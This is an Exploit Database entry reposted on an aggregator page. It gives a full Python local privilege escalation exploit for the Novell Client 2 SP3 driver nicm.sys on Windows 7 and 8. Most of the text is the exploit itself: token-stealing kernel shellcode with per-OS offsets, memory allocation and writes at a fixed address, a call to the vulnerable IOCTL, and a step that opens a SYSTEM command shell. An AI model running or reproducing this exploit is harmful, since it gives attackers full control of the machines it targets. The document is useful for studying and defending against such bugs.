Novell Client 2 SP3 – ‘nicm.sys 3.1.11.0’ Local Privilege Escalation

Exploit Database
139 阅读

作者： sickness

日期： 2013-07-29
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/27191/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

# Novell Client 2 SP3 Privilege escalation exploit

# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0

# Thanks to Master Ryujin :)

# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure weather there was anything else public)

# Exploit for DEMO purposes :)

# Does not bypass SMEP on Windows 8

# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/

from ctypes import *

import sys,struct,os

from optparse import OptionParser

kernel32 = windll.kernel32

ntdll= windll.ntdll

if __name__ == '__main__':

usage ="%prog -o <target>"

parser = OptionParser(usage=usage)

parser.add_option("-o", type="string",

action="store", dest="target_os",

help="Available target operating systems: WIN7, WIN8")

(options, args) = parser.parse_args()

OS = options.target_os

if not OS or OS.upper() not in ['WIN7','WIN8']:

parser.print_help()

sys.exit()

OS = OS.upper()

if OS == "WIN7":

_KPROCESS = "\x50" # Offset for Win7

_TOKEN= "\xf8" # Offset for Win7

_UPID = "\xb4" # Offset for Win7

_APLINKS= "\xb8" # Offset for Win7

steal_token ="\x52" +\

"\x53" +\

"\x33\xc0" +\

"\x64\x8b\x80\x24\x01\x00\x00" +\

"\x8b\x40" + _KPROCESS +\

"\x8b\xc8" +\

"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\

"\x89\x1d\x00\x09\x02\x00" +\

"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\

"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\

"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\

"\x75\xe8" +\

"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\

"\x8b\xc1" +\

"\x89\x90" + _TOKEN + "\x00\x00\x00" +\

"\x5b" +\

"\x5a" +\

"\xc2\x08"

sc = steal_token

else:

_KPROCESS = "\x80" # Offset for Win8

_TOKEN= "\xEC" # Offset for Win8

_UPID = "\xB4" # Offset for Win8

_APLINKS= "\xB8" # Offset for Win8

steal_token ="\x52" +\

"\x53" +\

"\x33\xc0" +\

"\x64\x8b\x80\x24\x01\x00\x00" +\

"\x8b\x80" + _KPROCESS + "\x00\x00\x00"+\

"\x8b\xc8" +\

"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\

"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\

"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\

"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\

"\x75\xe8" +\

"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\

"\x8b\xc1" +\

"\x89\x90" + _TOKEN + "\x00\x00\x00" +\

"\x5b" +\

"\x5a" +\

"\xc2\x08"

sc = steal_token

kernel_sc = "\x14\x00\x0d\x0d"

kernel_sc+= "\x41\x41\x41\x41"

kernel_sc+= "\x18\x00\x0d\x0d"

kernel_sc+= "\x41\x41\x41\x41"

kernel_sc+= "\x28\x00\x0d\x0d"

kernel_sc+= sc

print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."

print "[>] Finding the driver."

GENERIC_READ = 0x80000000

GENERIC_WRITE = 0x40000000

OPEN_EXISTING = 0x3

DEVICE = '\\\\.\\nicm'

device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)

EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL

retn = c_ulong()

inut_buffer = 0x0d0d0000

inut_size = 0x14

output_buffer = 0x0

output_size = 0x0

baseadd= c_int(0x0d0d0000)

MEMRES = (0x1000 | 0x2000)

PAGEEXE= 0x00000040

Zero_Bits = c_int(0)

RegionSize = c_int(0x1000)

write= c_int(0)

print "[>] Allocating memory for our shellcode."

dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)

print "[>] Writing the shellcode."

kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write))

if device_handler:

print "[>] Sending IOCTL to the driver."

dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)

print "[>] Dropping to a SYSTEM shell."

os.system("cmd.exe /K cd C:\\windows\\system32")